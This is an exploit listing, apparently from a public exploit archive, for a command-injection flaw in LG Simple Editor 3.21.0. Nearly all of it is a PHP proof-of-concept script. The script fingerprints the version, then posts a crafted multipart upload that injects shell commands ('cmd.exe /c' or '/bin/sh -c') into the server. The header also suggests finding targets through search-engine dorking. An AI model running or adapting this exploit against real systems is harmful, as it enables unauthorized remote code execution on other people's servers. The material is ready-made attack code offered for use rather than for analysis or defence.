Share
## https://sploitus.com/exploit?id=PACKETSTORM:212247
=============================================================================================================================================
    | # Title     : LG Simple Editor 3.21.0 PHP Code Injection Vulnerability                                                                    |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.lg.com/                                                                                                         |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Code Description: LG Simple Editor Remote Command Injection Exploit Supports both Windows and Linux systems.
    	
    	( https://packetstorm.news/files/id/180171/  CVE-2023-40504)
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 87
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    /**
     * LG Simple Editor PHP Code Injection Exploit (CVE-2023-40504)
     * Author: [indoushka]
     */
    
    class LGSimpleEditorExploit
    {
        private $target;
        private $port;
    
        public function __construct($target, $port = 8080)
        {
            $this->target = rtrim($target, '/');
            $this->port = $port;
        }
    
        public function checkVulnerability()
        {
            $url = "$this->target:$this->port/simpleeditor/common/commonReleaseNotes.do";
            $response = $this->sendRequest('GET', $url);
    
            if (!$response) {
                return "Unknown - Could not connect to web service - no response";
            }
    
            preg_match('/v([0-9.]+)/', $response, $matches);
            $version = isset($matches[1]) ? $matches[1] : 'Unknown';
            
            if ($version === 'Unknown') {
                return "Unknown";
            }
    
            return version_compare($version, '3.21.0', '<=') ? "Vulnerable (Version: $version)" : "Safe";
        }
    
        public function exploit($command)
        {
            echo "Sending command injection...\n";
            $this->executeCommand($command);
            echo "Exploit finished, check thy shell.\n";
        }
    
        private function executeCommand($command)
        {
            $filename = substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"), 0, rand(1, 6));
            $boundary = "----WebKitFormBoundary" . md5(time());
    
            $payload = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? "cmd.exe /c $command" : "/bin/sh -c '$command'";
            
            $postData = "--$boundary\r\n";
            $postData .= "Content-Disposition: form-data; name=\"uploadVideo\"; filename=\"$filename.mp4\"\r\n";
            $postData .= "Content-Type: application/octet-stream\r\n\r\n";
            $postData .= "/\"&#$payload&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del $filename.mp4&/../\r\n";
            $postData .= "--$boundary--\r\n";
    
            $url = "$this->target:$this->port/simpleeditor/imageManager/uploadVideo.do";
            $response = $this->sendRequest('POST', $url, $postData, $boundary);
            
            if ($response) {
                echo "Command injection sent.\n";
            } else {
                die("Unexpected response received.\n");
            }
        }
    
        private function sendRequest($method, $url, $data = null, $boundary = null)
        {
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
            if ($data) {
                curl_setopt($ch, CURLOPT_POST, true);
                curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
                curl_setopt($ch, CURLOPT_HTTPHEADER, [
                    "Content-Type: multipart/form-data; boundary=$boundary"
                ]);
            }
            $response = curl_exec($ch);
            curl_close($ch);
            return $response;
        }
    }
    
    // Example usage:
    $exploit = new LGSimpleEditorExploit('http://target-ip');
    echo $exploit->checkVulnerability() . "\n";
    $exploit->exploit('whoami');
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================